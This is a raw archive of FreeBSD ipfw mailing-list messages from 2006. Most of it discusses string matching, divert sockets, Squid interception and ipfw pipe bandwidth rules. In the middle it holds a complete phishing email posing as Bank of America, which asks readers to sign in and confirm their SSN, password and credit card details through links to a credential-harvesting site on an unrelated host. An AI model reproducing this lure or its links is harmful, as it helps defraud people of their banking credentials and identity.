Cc: ipfw@freebsd.org, vladone Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 28 Apr 2006 19:27:01 -0000 Daniel Walker wrote: > IPTABLES allows for string matching. IPFW does not. I'll > have to fire up my Ubuntu to do this. > This has been brought up before on this list. IPFW does not intend on ever supporting string matching as a standard feature. The developers feel that this kind of expensive operation does not belong in the kernel with IPFW. This does not mean that this functionality is impossible to do with IPFW/freebsd. AFAIK String match deny processing should be done using divert(4) sockets like natd. You use IPFW to divert outgoing DNS requests to your natd-like (userland) process. This process determines whether or not it contains your string and blocks the request/response if it does. Unfortunately I'm not aware of a userland app that does this today. -Corey Smith From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 28 20:49:46 2006 Return-Path: X-Original-To: ipfw@freebsd.org Delivered-To: freebsd-ipfw@FreeBSD.ORG Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B915216A400 for ; Fri, 28 Apr 2006 20:49:46 +0000 (UTC) (envelope-from mcgehrin@reverse.net) Received: from c3p0.reverse.net (c3p0.reverse.net [66.225.200.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2856143D46 for ; Fri, 28 Apr 2006 20:49:45 +0000 (GMT) (envelope-from mcgehrin@reverse.net) Received: from orange (mx1.reverse.net [66.225.200.253]) by c3p0.reverse.net (Postfix) with SMTP id 23F111040F for ; Fri, 28 Apr 2006 16:49:45 -0400 (EDT) Message-ID: <000601c66b05$47e0c840$af00a8c0@orange> From: "Matthew McGehrin" To: References: <44526C7C.10208@bonddesk.com> Date: Fri, 28 Apr 2006 16:49:44 -0400 MIME-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1"; reply-type=response Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2900.2869 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2869 Cc: Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Matthew McGehrin List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 28 Apr 2006 20:49:46 -0000 Perhaps a transparent squid proxy. Redirect the http requests to squid, and then block the sites there. 17. Interception Caching/Proxying http://www.squid-cache.org/Doc/FAQ/FAQ-17.html ----- Original Message ----- From: "Corey Smith" To: "Daniel Walker" Cc: ; "vladone" Sent: Friday, April 28, 2006 3:26 PM Subject: Re: IPTABLES to IPFW for Packet Inspection Filtering > Daniel Walker wrote: >> IPTABLES allows for string matching. IPFW does not. I'll have to fire >> up my Ubuntu to do this. > AFAIK String match deny processing should be done using divert(4) sockets > like natd. You use IPFW to divert outgoing DNS requests to your natd-like > (userland) process. This process determines whether or not it contains > your string and blocks the request/response if it does. From owner-freebsd-ipfw@FreeBSD.ORG Sat Apr 29 05:52:15 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7C33816A409 for ; Sat, 29 Apr 2006 05:52:15 +0000 (UTC) (envelope-from nobody@web.q8line.net) Received: from web.q8line.net (web.q8line.net [208.185.82.130]) by mx1.FreeBSD.org (Postfix) with ESMTP id 09CE043D5C for ; Sat, 29 Apr 2006 05:52:09 +0000 (GMT) (envelope-from nobody@web.q8line.net) Received: from nobody by web.q8line.net with local (Exim 4.61 (FreeBSD)) (envelope-from ) id 1FZiNE-00008E-Rs for freebsd-ipfw@freebsd.org; Sat, 29 Apr 2006 08:52:08 +0300 To: freebsd-ipfw@freebsd.org From: Bank Of America Online Bank Content-Transfer-Encoding: 8bit Message-Id: Date: Sat, 29 Apr 2006 08:52:08 +0300 X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - web.q8line.net X-AntiAbuse: Original Domain - freebsd.org X-AntiAbuse: Originator/Caller UID/GID - [65534 1289] / [26 6] X-AntiAbuse: Sender Address Domain - web.q8line.net X-Source: /bin/sh X-Source-Args: sh -c /usr/sbin/sendmail -t -i X-Source-Dir: kuwait99.com:/public_html/pr/sessions MIME-Version: 1.0 Content-Type: text/plain X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: Restore your online bank account X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Online@bankofamerica.com List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 29 Apr 2006 05:52:15 -0000 [mhd_reg_logo.gif] Security Update Notification Dear Valued Customer : As part of our security measures, we regularly screen activity in the Bank of America Online Bank system. We recently contacted you after noticing an issue on your account.We requested information from you for the following reason: Our system requires further account verification To restore your account, please [1]click here. Your account might be place on restricted status. Restricted accounts continue to receive payments, but they are limited in their ability to send or withdraw funds. To lift up this restriction, you need to login into your account (with your username or SSN and your password), then you have to complete our verification process. You must confirm your credit card details and your billing information as well. All restricted accounts have their billing information unconfirmed, meaning that you may no longer send money from your account until you have reactive your billing information on file. [2]Sign in to Online Banking Thank You. _________________________________________________________________ Because your reply will not be transmitted via secure e-mail, the e-mail address that generated this alert will not accept replies. If you would like to contact Bank of America with questions or comments, please[3] sign in to Online Banking and visit the customer service section. Bank of America, N.A. Member FDIC. Equal Housing Lender Equal Housing Lender ©2005 Bank of America Corporation. All rights reserved. [4]Bank of America Higher Standards [5][foot_olympic.gif] References 1. http://thetoughskins.clanservers.com/vspstats/sql/BankOfAmerica/onlineid-sessionload/cgi-bin/sso.login.controllernoscript=true// 2. http://thetoughskins.clanservers.com/vspstats/sql/BankOfAmerica/onlineid-sessionload/cgi-bin/sso.login.controllernoscript=true/ 3. http://thetoughskins.clanservers.com/vspstats/sql/BankOfAmerica/onlineid-sessionload/cgi-bin/sso.login.controllernoscript=true/ 4. http://www.bankofamerica.com/ 5. file://localhost/tmp/Drag%20to%20a%20file%20to%20make%20a%20link. From owner-freebsd-ipfw@FreeBSD.ORG Sat Apr 29 12:35:42 2006 Return-Path: X-Original-To: ipfw@freebsd.org Delivered-To: freebsd-ipfw@FreeBSD.ORG Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8C85016A410 for ; Sat, 29 Apr 2006 12:35:42 +0000 (UTC) (envelope-from vladone@spaingsm.com) Received: from mail.spaingsm.com (llwb135.servidoresdns.net [217.76.137.82]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3B98443D46 for ; Sat, 29 Apr 2006 12:35:40 +0000 (GMT) (envelope-from vladone@spaingsm.com) Received: from SERVER (unknown [88.158.112.6]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (No client certificate requested) by mail.spaingsm.com (Postfix) with ESMTP id 5BDC724C62E for ; Sat, 29 Apr 2006 14:09:57 +0200 (CEST) Date: Sat, 29 Apr 2006 15:35:42 +0300 From: vladone X-Mailer: The Bat! (v3.62.14) Professional X-Priority: 3 (Normal) Message-ID: <321737321.20060429153542@spaingsm.com> To: ipfw@freebsd.org In-Reply-To: <20060428165726.2fe9ceb9@giboia> References: <20060427164741.5f657901@giboia> <1129312329.20060428180201@spaingsm.com> <20060428165726.2fe9ceb9@giboia> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Cc: Subject: Re[2]: Pipes. X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: vladone List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 29 Apr 2006 12:35:42 -0000 Try this: ipfw pipe 100 config bw 500kbit/s mask dst-ip 0x000000ff ipfw add 200 pipe 100 ip from any to 10.0.0.0/24 out xmit em1 ipfw add 65000 allow ip from any to any Is strange how is blocked network! Try to test your rules, beginning from simply situation, using only few needed rules. Queue about 50Kbytes, i think that is set by default, so no need to set again. -- Best regards, vladone mailto:vladone@spaingsm.com